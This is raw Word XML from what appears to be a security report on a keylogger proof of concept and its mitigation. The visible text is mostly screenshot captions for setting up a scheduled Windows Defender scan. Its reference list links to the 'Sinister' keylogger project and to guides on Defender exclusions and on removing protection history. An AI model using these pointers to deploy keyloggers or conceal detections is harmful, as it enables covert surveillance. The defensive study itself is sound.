    <w:p w14:paraId="000F7A30" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>General Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCF3689" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="765BDC58" wp14:editId="3D210611">
            <wp:extent cx="3006508" cy="2283606"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="Picture" descr="Task Scheduler Gener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POC_1/Mitigation/Conduct_Scheduled_Scans/POC1_Task_Scheduler_General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508" cy="228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C2153" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task Scheduler General</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234768DC" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Triggers Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E957E" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36F29BCF" wp14:editId="145021AE">
            <wp:extent cx="5334000" cy="660961"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="Picture" descr="Task Scheduler Trigg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POC_1/Mitigation/Conduct_Scheduled_Scans/POC1_Task_Scheduler_Trigger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9C6E2" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task Scheduler Triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741FAA35" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1B8D9" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00686F25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6128BCA4" wp14:editId="72D9D4C3">
            <wp:extent cx="5943600" cy="1346200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12033174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317499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D57F0" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C44057" wp14:editId="68E51B0D">
            <wp:extent cx="3295650" cy="3625947"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="Picture" descr="Task Scheduler Ac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POC_1/Mitigation/Conduct_Scheduled_Scans/POC1_Task_Scheduler_Action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196" cy="36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37CD0" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task Scheduler Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7FD52" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27AE10C0" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC5670C" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conditions Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F1445" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="384BAC92" wp14:editId="4A2837A1">
            <wp:extent cx="4124325" cy="3127668"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="Picture" descr="Task Scheduler Cond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POC_1/Mitigation/Conduct_Scheduled_Scans/POC1_Task_Scheduler_Condition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950" cy="313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897DE6" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task Scheduler Conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AFAA6E" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Settings Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A41E8" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03EAE61F" wp14:editId="658AE370">
            <wp:extent cx="3800475" cy="2569210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="Picture" descr="Task Scheduler Setting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POC_1/Mitigation/Conduct_Scheduled_Scans/POC1_Task_Scheduler_Setting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719" cy="256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F5C8A" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task Scheduler Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B66A0BA" w14:textId="77777777" w:rsidR="00000391" w:rsidRDefault="0000039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BD0386B" w14:textId="3543F6FA" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E115E7D" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:hyperlink r:id="rId32">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Sinister</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>How Keyloggers Work</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Usages of Keyloggers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Removing Protection History report from Windows Defender</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Microsoft Defender Antivirus exclusions on Windows Server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Schedule a Scan in Microsoft Defender</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:sectPr w:rsidR="00285D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44440" w14:textId="77777777" w:rsidR="001419CB" w:rsidRDefault="001419CB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6EB54000" w14:textId="77777777" w:rsidR="001419CB" w:rsidRDefault="001419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3762F" w14:textId="77777777" w:rsidR="001419CB" w:rsidRDefault="001419CB">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="413DD4DD" w14:textId="77777777" w:rsidR="001419CB" w:rsidRDefault="001419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CEDD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93ACA9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2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53B0F2D6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2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00A99413"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80F0F856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3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="3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0A99414"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20187DD2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4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00A99415"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="840C204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E0E087D0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="480" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1200" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1920" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2640" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3360" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4080" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4800" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="6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00A99417"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDFE707A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ind w:left="1200" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1920" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2640" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3360" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4080" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4800" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="7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00A99418"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13669EA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8E2E26D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D7743C6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130C5CD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53B0F2D6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2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="13F419DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80F0F856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3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E5F3D39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0E087D0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="480" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1200" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1920" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2640" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3360" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4080" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4800" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="6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4D37082D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F93ACA9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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="58CE1F5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDFE707A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ind w:left="1200" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1920" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2640" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3360" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4080" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4800" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C4A5DF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53B0F2D6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2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E681604"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80F0F856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3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="68FA7D56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F93ACA9A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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7C5B6FEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20187DD2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4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="229199845">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="117102100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17194761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4125936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47135473">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="190699013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416323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565635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213046579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52294093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01916037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12527067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4034546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151819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019070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7607595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29976783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42665473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9" w16cid:durableId="180022438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 w16cid:durableId="35942987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1" w16cid:durableId="192737784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2" w16cid:durableId="160098312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3" w16cid:durableId="20082737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4" w16cid:durableId="664619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3299144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154240268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415392041">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="445006161">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1924560331">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1043554560">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="2113358519">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="664168533">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="720446989">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1352216831">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="11916446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5D65"/>
    <w:rsid w:val="00000391"/>
    <w:rsid w:val="000B0195"/>
    <w:rsid w:val="0011508F"/>
    <w:rsid w:val="00132391"/>
    <w:rsid w:val="001419CB"/>
    <w:rsid w:val="001753AC"/>
    <w:rsid w:val="00285D65"/>
    <w:rsid w:val="003C110A"/>
    <w:rsid w:val="003F7580"/>
    <w:rsid w:val="00443261"/>
    <w:rsid w:val="00504503"/>
    <w:rsid w:val="0073098D"/>
    <w:rsid w:val="00822624"/>
    <w:rsid w:val="0087638D"/>
    <w:rsid w:val="008A774E"/>
    <w:rsid w:val="008B3361"/>
    <w:rsid w:val="008D5EDB"/>
    <w:rsid w:val="009A6C8D"/>
    <w:rsid w:val="00C44468"/>
    <w:rsid w:val="00E402BF"/>
    <w:rsid w:val="00F204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A3B00"/>
  <w15:docId w15:val="{AF52D528-9988-4E99-90AD-CCBAFCA6E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000391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0039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0391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0003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hyperlink" Target="https://cybersecuritynews.com/keylogger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sophos.com/en-us/cybersecurity-explained/keylogger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ithub.com/PushpenderIndia/Sinister/tree/master" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/windows/schedule-a-scan-in-microsoft-defender-antivirus-54b64e9c-880a-c6b6-2416-0eb330ed5d2d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learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-server-exclusions-microsoft-defender-antivirus?view=o365-worldwide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answers.microsoft.com/en-us/windows/forum/all/how-to-remove-a-protection-history-report-from/c73c5969-68fe-454e-833f-b602af0b175d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7</Pages>
  <Words>1036</Words>
  <Characters>6316</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>225</Lines>
  <Paragraphs>102</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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i Jia Le Sherlena /CSF</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-15T07:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-15T09:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>